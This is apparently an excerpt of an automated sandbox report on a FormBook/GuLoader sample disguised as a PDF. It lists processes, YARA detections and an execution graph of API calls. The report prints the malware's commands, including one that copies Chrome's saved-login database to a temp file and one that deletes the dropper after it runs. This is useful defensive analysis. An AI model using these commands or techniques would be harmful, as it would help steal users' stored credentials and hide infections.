                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:16:50:03
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.2299445190.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:16:50:18
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                              Imagebase:0x7ff75e730000
                                                                                                                                                                                                                              File size:4849904 bytes
                                                                                                                                                                                                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                              Start time:16:50:47
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                                                                                              Imagebase:0x970000
                                                                                                                                                                                                                              File size:23040 bytes
                                                                                                                                                                                                                              MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:16:50:51
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:/c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
                                                                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                                                                              File size:236544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:16:50:53
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff66d530000
                                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:16:53:44
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.4676824720.0000000002B50000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:16:53:49
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                                                                              File size:236544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:16:53:50
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff66d530000
                                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:16:53:50
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                              Imagebase:0x7ff66e4a0000
                                                                                                                                                                                                                              File size:597432 bytes
                                                                                                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:16:53:54
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                              Start time:16:54:00
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000023.00000000.4671499105.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:16:54:02
                                                                                                                                                                                                                              Start date:21/02/2022
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:628784 bytes
                                                                                                                                                                                                                              MD5 hash:319860D181378BF868E4DEEDCF5FBFB6
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language


                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:11.2%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:7.5%
                                                                                                                                                                                                                                Signature Coverage:19.1%
                                                                                                                                                                                                                                Total number of Nodes:1008
                                                                                                                                                                                                                                Total number of Limit Nodes:34
9440 405523 9439->9440 9441 405537 9439->9441 9442 405529 9440->9442 9451 405580 9440->9451 9443 40553f IsWindowVisible 9441->9443 9448 405556 9441->9448 9445 4044e5 SendMessageW 9442->9445 9446 40554c 9443->9446 9443->9451 9444 405585 CallWindowProcW 9449 405533 9444->9449 9445->9449 9452 404e54 SendMessageW 9446->9452 9448->9444 9457 404ed4 9448->9457 9451->9444 9453 404eb3 SendMessageW 9452->9453 9454 404e77 GetMessagePos ScreenToClient SendMessageW 9452->9454 9456 404eab 9453->9456 9455 404eb0 9454->9455 9454->9456 9455->9453 9456->9448 9466 40653d lstrcpynW 9457->9466 9459 404ee7 9467 406484 wsprintfW 9459->9467 9461 404ef1 9462 40140b 2 API calls 9461->9462 9463 404efa 9462->9463 9468 40653d lstrcpynW 9463->9468 9465 404f01 9465->9451 9466->9459 9467->9461 9468->9465 9954 40261c 9955 402da6 17 API calls 9954->9955 9956 402623 9955->9956 9959 40602d GetFileAttributesW CreateFileW 9956->9959 9958 40262f 9959->9958 10307 245ad26 10308 245b2a6 4 API calls 10307->10308 10309 245ad4d 10308->10309 10316 245ae8a 10309->10316 10311 245ad56 10313 245b11f 10311->10313 10319 245adc6 10311->10319 10314 245f5cb 16 API calls 10313->10314 10315 245f7aa 10314->10315 10317 245aefc 10316->10317 10318 245b083 CreateFileA 10317->10318 10318->10311 10320 245b2a6 4 API calls 10319->10320 10321 245adf4 10320->10321 10322 245ae8a CreateFileA 10321->10322 10323 245ae16 10322->10323 10323->10313 10324 245f5cb 16 API calls 10323->10324 10325 245f7aa 10324->10325 9478 40252a 9479 402de6 17 API calls 9478->9479 9480 402534 9479->9480 9481 402da6 17 API calls 9480->9481 9482 40253d 9481->9482 9483 402548 RegQueryValueExW 9482->9483 9488 40292e 9482->9488 9484 40256e RegCloseKey 9483->9484 9485 402568 9483->9485 9484->9488 9485->9484 9489 406484 wsprintfW 9485->9489 9489->9484 8149 40352d SetErrorMode GetVersionExW 8150 40357f GetVersionExW 8149->8150 8151 4035b7 8149->8151 8150->8151 8152 403610 8151->8152 8153 40690a 5 API calls 8151->8153 8154 40689a 3 API calls 8152->8154 8153->8152 
8155 403626 lstrlenA 8154->8155 8155->8152 8156 403636 8155->8156 8157 40690a 5 API calls 8156->8157 8158 40363d 8157->8158 8159 40690a 5 API calls 8158->8159 8160 403644 8159->8160 8161 40690a 5 API calls 8160->8161 8162 403650 #17 OleInitialize SHGetFileInfoW 8161->8162 8240 40653d lstrcpynW 8162->8240 8165 40369d GetCommandLineW 8241 40653d lstrcpynW 8165->8241 8167 4036af 8168 405e39 CharNextW 8167->8168 8169 4036d5 CharNextW 8168->8169 8177 4036e6 8169->8177 8170 4037e4 8171 4037f8 GetTempPathW 8170->8171 8242 4034fc 8171->8242 8173 403810 8174 403814 GetWindowsDirectoryW lstrcatW 8173->8174 8175 40386a DeleteFileW 8173->8175 8178 4034fc 12 API calls 8174->8178 8252 40307d GetTickCount GetModuleFileNameW 8175->8252 8176 405e39 CharNextW 8176->8177 8177->8170 8177->8176 8183 4037e6 8177->8183 8180 403830 8178->8180 8180->8175 8182 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 8180->8182 8181 40387d 8184 403941 8181->8184 8188 403932 8181->8188 8192 405e39 CharNextW 8181->8192 8187 4034fc 12 API calls 8182->8187 8336 40653d lstrcpynW 8183->8336 8344 403b12 8184->8344 8191 403862 8187->8191 8280 403bec 8188->8280 8191->8175 8191->8184 8204 40389f 8192->8204 8193 403a69 8351 405b9d 8193->8351 8194 403a7e 8196 403a86 GetCurrentProcess OpenProcessToken 8194->8196 8197 403afc ExitProcess 8194->8197 8202 403acc 8196->8202 8203 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 8196->8203 8199 403908 8206 405f14 18 API calls 8199->8206 8200 403949 8205 405b08 5 API calls 8200->8205 8207 40690a 5 API calls 8202->8207 8203->8202 8204->8199 8204->8200 8208 40394e lstrcatW 8205->8208 8209 403914 8206->8209 8210 403ad3 8207->8210 8211 40396a lstrcatW lstrcmpiW 8208->8211 8212 40395f lstrcatW 8208->8212 8209->8184 8337 40653d lstrcpynW 8209->8337 8213 403ae8 ExitWindowsEx 8210->8213 8214 403af5 8210->8214 8211->8184 8215 40398a 8211->8215 8212->8211 8213->8197 8213->8214 8355 40140b 8214->8355 8218 403996 8215->8218 8219 40398f 8215->8219 8222 
405aeb 2 API calls 8218->8222 8221 405a6e 4 API calls 8219->8221 8220 403927 8338 40653d lstrcpynW 8220->8338 8224 403994 8221->8224 8225 40399b SetCurrentDirectoryW 8222->8225 8224->8225 8226 4039b8 8225->8226 8227 4039ad 8225->8227 8340 40653d lstrcpynW 8226->8340 8339 40653d lstrcpynW 8227->8339 8230 40657a 17 API calls 8231 4039fa DeleteFileW 8230->8231 8232 403a06 CopyFileW 8231->8232 8236 4039c5 8231->8236 8232->8236 8233 403a50 8234 4062fd 36 API calls 8233->8234 8234->8184 8235 4062fd 36 API calls 8235->8236 8236->8230 8236->8233 8236->8235 8237 40657a 17 API calls 8236->8237 8239 403a3a CloseHandle 8236->8239 8341 405b20 CreateProcessW 8236->8341 8237->8236 8239->8236 8240->8165 8241->8167 8243 4067c4 5 API calls 8242->8243 8244 403508 8243->8244 8245 403512 8244->8245 8246 405e0c 3 API calls 8244->8246 8245->8173 8247 40351a 8246->8247 8248 405aeb 2 API calls 8247->8248 8249 403520 8248->8249 8358 40605c 8249->8358 8362 40602d GetFileAttributesW CreateFileW 8252->8362 8254 4030bd 8271 4030cd 8254->8271 8363 40653d lstrcpynW 8254->8363 8256 4030e3 8257 405e58 2 API calls 8256->8257 8258 4030e9 8257->8258 8364 40653d lstrcpynW 8258->8364 8260 4030f4 GetFileSize 8276 4031ee 8260->8276 8279 40310b 8260->8279 8262 4031f7 8264 403227 GlobalAlloc 8262->8264 8262->8271 8400 4034e5 SetFilePointer 8262->8400 8376 4034e5 SetFilePointer 8264->8376 8266 40325a 8268 403019 6 API calls 8266->8268 8268->8271 8269 403210 8272 4034cf ReadFile 8269->8272 8270 403242 8377 4032b4 8270->8377 8271->8181 8274 40321b 8272->8274 8274->8264 8274->8271 8275 403019 6 API calls 8275->8279 8365 403019 8276->8365 8277 40324e 8277->8271 8277->8277 8278 40328b SetFilePointer 8277->8278 8278->8271 8279->8266 8279->8271 8279->8275 8279->8276 8397 4034cf 8279->8397 8281 40690a 5 API calls 8280->8281 8282 403c00 8281->8282 8283 403c06 8282->8283 8284 403c18 8282->8284 8421 406484 wsprintfW 8283->8421 8285 40640b 3 API calls 8284->8285 8286 403c48 8285->8286 8288 403c67 lstrcatW 8286->8288 
8290 40640b 3 API calls 8286->8290 8289 403c16 8288->8289 8406 403ec2 8289->8406 8290->8288 8293 405f14 18 API calls 8294 403c99 8293->8294 8295 403d2d 8294->8295 8298 40640b 3 API calls 8294->8298 8296 405f14 18 API calls 8295->8296 8297 403d33 8296->8297 8300 403d43 LoadImageW 8297->8300 8301 40657a 17 API calls 8297->8301 8299 403ccb 8298->8299 8299->8295 8304 403cec lstrlenW 8299->8304 8307 405e39 CharNextW 8299->8307 8302 403de9 8300->8302 8303 403d6a RegisterClassW 8300->8303 8301->8300 8306 40140b 2 API calls 8302->8306 8305 403da0 SystemParametersInfoW CreateWindowExW 8303->8305 8335 403df3 8303->8335 8308 403d20 8304->8308 8309 403cfa lstrcmpiW 8304->8309 8305->8302 8312 403def 8306->8312 8310 403ce9 8307->8310 8313 405e0c 3 API calls 8308->8313 8309->8308 8311 403d0a GetFileAttributesW 8309->8311 8310->8304 8314 403d16 8311->8314 8315 403ec2 18 API calls 8312->8315 8312->8335 8316 403d26 8313->8316 8314->8308 8317 405e58 2 API calls 8314->8317 8318 403e00 8315->8318 8422 40653d lstrcpynW 8316->8422 8317->8308 8320 403e0c ShowWindow 8318->8320 8321 403e8f 8318->8321 8323 40689a 3 API calls 8320->8323 8414 405672 OleInitialize 8321->8414 8324 403e24 8323->8324 8326 403e32 GetClassInfoW 8324->8326 8329 40689a 3 API calls 8324->8329 8325 403e95 8327 403eb1 8325->8327 8328 403e99 8325->8328 8331 403e46 GetClassInfoW RegisterClassW 8326->8331 8332 403e5c DialogBoxParamW 8326->8332 8330 40140b 2 API calls 8327->8330 8334 40140b 2 API calls 8328->8334 8328->8335 8329->8326 8330->8335 8331->8332 8333 40140b 2 API calls 8332->8333 8333->8335 8334->8335 8335->8184 8336->8171 8337->8220 8338->8188 8339->8226 8340->8236 8342 405b53 CloseHandle 8341->8342 8343 405b5f 8341->8343 8342->8343 8343->8236 8345 403b2a 8344->8345 8346 403b1c CloseHandle 8344->8346 8434 403b57 8345->8434 8346->8345 8349 405c49 67 API calls 8350 403a5e OleUninitialize 8349->8350 8350->8193 8350->8194 8352 405bb2 8351->8352 8353 403a76 ExitProcess 8352->8353 8354 405bc6 MessageBoxIndirectW 
8352->8354 8354->8353 8356 401389 2 API calls 8355->8356 8357 401420 8356->8357 8357->8197 8359 406069 GetTickCount GetTempFileNameW 8358->8359 8360 40609f 8359->8360 8361 40352b 8359->8361 8360->8359 8360->8361 8361->8173 8362->8254 8363->8256 8364->8260 8366 403022 8365->8366 8367 40303a 8365->8367 8368 403032 8366->8368 8369 40302b DestroyWindow 8366->8369 8370 403042 8367->8370 8371 40304a GetTickCount 8367->8371 8368->8262 8369->8368 8401 406946 8370->8401 8372 403058 CreateDialogParamW ShowWindow 8371->8372 8373 40307b 8371->8373 8372->8373 8373->8262 8376->8270 8378 4032cd 8377->8378 8379 4032fb 8378->8379 8405 4034e5 SetFilePointer 8378->8405 8381 4034cf ReadFile 8379->8381 8382 403306 8381->8382 8383 403468 8382->8383 8384 403318 GetTickCount 8382->8384 8385 403452 8382->8385 8386 4034aa 8383->8386 8389 40346c 8383->8389 8384->8385 8393 403367 8384->8393 8385->8277 8388 4034cf ReadFile 8386->8388 8387 4034cf ReadFile 8387->8393 8388->8385 8389->8385 8390 4034cf ReadFile 8389->8390 8391 4060df WriteFile 8389->8391 8390->8389 8391->8389 8392 4033bd GetTickCount 8392->8393 8393->8385 8393->8387 8393->8392 8394 4033e2 MulDiv wsprintfW 8393->8394 8396 4060df WriteFile 8393->8396 8395 40559f 24 API calls 8394->8395 8395->8393 8396->8393 8398 4060b0 ReadFile 8397->8398 8399 4034e2 8398->8399 8399->8279 8400->8269 8402 406963 PeekMessageW 8401->8402 8403 403048 8402->8403 8404 406959 DispatchMessageW 8402->8404 8403->8262 8404->8402 8405->8379 8407 403ed6 8406->8407 8423 406484 wsprintfW 8407->8423 8409 403f47 8424 403f7b 8409->8424 8411 403c77 8411->8293 8412 403f4c 8412->8411 8413 40657a 17 API calls 8412->8413 8413->8412 8427 4044e5 8414->8427 8416 4056bc 8417 4044e5 SendMessageW 8416->8417 8418 4056ce OleUninitialize 8417->8418 8418->8325 8419 405695 8419->8416 8430 401389 8419->8430 8421->8289 8422->8295 8423->8409 8425 40657a 17 API calls 8424->8425 8426 403f89 SetWindowTextW 8425->8426 8426->8412 8428 4044fd 8427->8428 8429 4044ee SendMessageW 8427->8429 
8428->8419 8429->8428 8432 401390 8430->8432 8431 4013fe 8431->8419 8432->8431 8433 4013cb MulDiv SendMessageW 8432->8433 8433->8432 8435 403b65 8434->8435 8436 403b2f 8435->8436 8437 403b6a FreeLibrary GlobalFree 8435->8437 8436->8349 8437->8436 8437->8437 9989 40263e 9990 402652 9989->9990 9991 40266d 9989->9991 9992 402d84 17 API calls 9990->9992 9993 402672 9991->9993 9994 40269d 9991->9994 10003 402659 9992->10003 9995 402da6 17 API calls 9993->9995 9996 402da6 17 API calls 9994->9996 9997 402679 9995->9997 9998 4026a4 lstrlenW 9996->9998 10006 40655f WideCharToMultiByte 9997->10006 9998->10003 10000 40268d lstrlenA 10000->10003 10001 4026d1 10002 4060df WriteFile 10001->10002 10004 4026e7 10001->10004 10002->10004 10003->10001 10003->10004 10007 40610e SetFilePointer 10003->10007 10006->10000 10008 40612a 10007->10008 10011 406142 10007->10011 10009 4060b0 ReadFile 10008->10009 10010 406136 10009->10010 10010->10011 10012 406173 SetFilePointer 10010->10012 10013 40614b SetFilePointer 10010->10013 10011->10001 10012->10011 10013->10012 10014 406156 10013->10014 10015 4060df WriteFile 10014->10015 10015->10011 8105 4015c1 8106 402da6 17 API calls 8105->8106 8107 4015c8 8106->8107 8108 405eb7 4 API calls 8107->8108 8121 4015d1 8108->8121 8109 401631 8111 401663 8109->8111 8112 401636 8109->8112 8110 405e39 CharNextW 8110->8121 8114 401423 24 API calls 8111->8114 8132 401423 8112->8132 8118 40165b 8114->8118 8120 40164a SetCurrentDirectoryW 8120->8118 8121->8109 8121->8110 8122 401617 GetFileAttributesW 8121->8122 8124 405b08 8121->8124 8127 405a6e CreateDirectoryW 8121->8127 8136 405aeb CreateDirectoryW 8121->8136 8122->8121 8139 40690a GetModuleHandleA 8124->8139 8128 405abb 8127->8128 8129 405abf GetLastError 8127->8129 8128->8121 8129->8128 8130 405ace SetFileSecurityW 8129->8130 8130->8128 8131 405ae4 GetLastError 8130->8131 8131->8128 8133 40559f 24 API calls 8132->8133 8134 401431 8133->8134 8135 40653d lstrcpynW 8134->8135 8135->8120 8137 405afb 
